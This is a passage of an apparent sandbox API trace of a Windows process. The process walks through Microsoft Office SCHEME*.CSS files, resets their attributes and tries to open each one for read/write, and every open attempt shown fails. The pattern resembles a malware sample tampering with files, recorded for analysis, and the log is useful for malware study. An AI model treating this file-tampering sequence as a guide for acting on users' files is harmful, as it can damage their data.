dwFreeType=0x8000) returned 1 [0136.299] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.299] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME02.CSS", dwFileAttributes=0x80) returned 0 [0136.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME02.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme02.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.300] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.300] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.300] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.300] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME03.CSS", dwFileAttributes=0x80) returned 0 [0136.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME03.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme03.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.301] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.301] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.301] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.301] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.301] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME04.CSS", dwFileAttributes=0x80) returned 0 [0136.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME04.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme04.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.302] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.302] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.302] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME05.CSS", dwFileAttributes=0x80) returned 0 [0136.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME05.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme05.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.302] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.302] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.302] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.302] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME06.CSS", dwFileAttributes=0x80) returned 0 [0136.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME06.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme06.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.303] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.303] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.303] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.303] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME07.CSS", dwFileAttributes=0x80) returned 0 [0136.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME07.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme07.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.304] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.304] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.304] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.304] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.304] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME08.CSS", dwFileAttributes=0x80) returned 0 [0136.304] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME08.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme08.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.305] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.305] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.305] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.305] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME09.CSS", dwFileAttributes=0x80) returned 0 [0136.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME09.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme09.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.305] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.305] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.305] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.305] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME10.CSS", dwFileAttributes=0x80) returned 0 [0136.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME10.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme10.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.306] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.306] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.306] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.306] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.306] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME11.CSS", dwFileAttributes=0x80) returned 0 [0136.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME11.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme11.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.307] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.307] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.307] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.307] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME12.CSS", dwFileAttributes=0x80) returned 0 [0136.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME12.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme12.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.307] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.308] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.308] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.308] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME13.CSS", dwFileAttributes=0x80) returned 0 [0136.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME13.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme13.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.308] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.308] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.308] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.308] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME14.CSS", dwFileAttributes=0x80) returned 0 [0136.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME14.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme14.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.309] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.309] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.309] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.309] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.309] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME15.CSS", dwFileAttributes=0x80) returned 0 [0136.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME15.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme15.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.310] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.310] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.310] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.310] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.310] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME16.CSS", dwFileAttributes=0x80) returned 0 [0136.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME16.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme16.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.311] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.311] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.311] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME17.CSS", dwFileAttributes=0x80) returned 0 [0136.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME17.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme17.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.311] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.311] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.312] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.312] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME18.CSS", dwFileAttributes=0x80) returned 0 [0136.312] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME18.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme18.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.312] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.312] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.312] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME19.CSS", dwFileAttributes=0x80) returned 0 [0136.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME19.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme19.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.313] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.313] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.314] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME20.CSS", dwFileAttributes=0x80) returned 0 [0136.314] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME20.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme20.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.314] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.314] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.314] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.314] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.314] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME21.CSS", dwFileAttributes=0x80) returned 0 [0136.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME21.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme21.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.315] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.315] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME22.CSS", dwFileAttributes=0x80) returned 0 [0136.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME22.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme22.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.315] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.315] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.315] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.315] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.316] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME23.CSS", dwFileAttributes=0x80) returned 0 [0136.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME23.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme23.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.316] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.316] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.316] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.316] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME24.CSS", dwFileAttributes=0x80) returned 0 [0136.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME24.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme24.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.317] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.317] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.317] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.317] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME25.CSS", dwFileAttributes=0x80) returned 0 [0136.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME25.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme25.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.317] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.317] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.318] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.318] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME26.CSS", dwFileAttributes=0x80) returned 0 [0136.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME26.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme26.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.318] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.318] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.318] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.318] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME27.CSS", dwFileAttributes=0x80) returned 0 [0136.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME27.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme27.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.319] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.319] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.319] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.319] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.319] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME28.CSS", dwFileAttributes=0x80) returned 0 [0136.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME28.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme28.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.320] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.320] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.320] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME29.CSS", dwFileAttributes=0x80) returned 0 [0136.320] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME29.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme29.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.320] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.320] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.320] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.320] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.321] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME30.CSS", dwFileAttributes=0x80) returned 0 [0136.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBFTSCM\\SCHEME30.CSS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubftscm\\scheme30.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 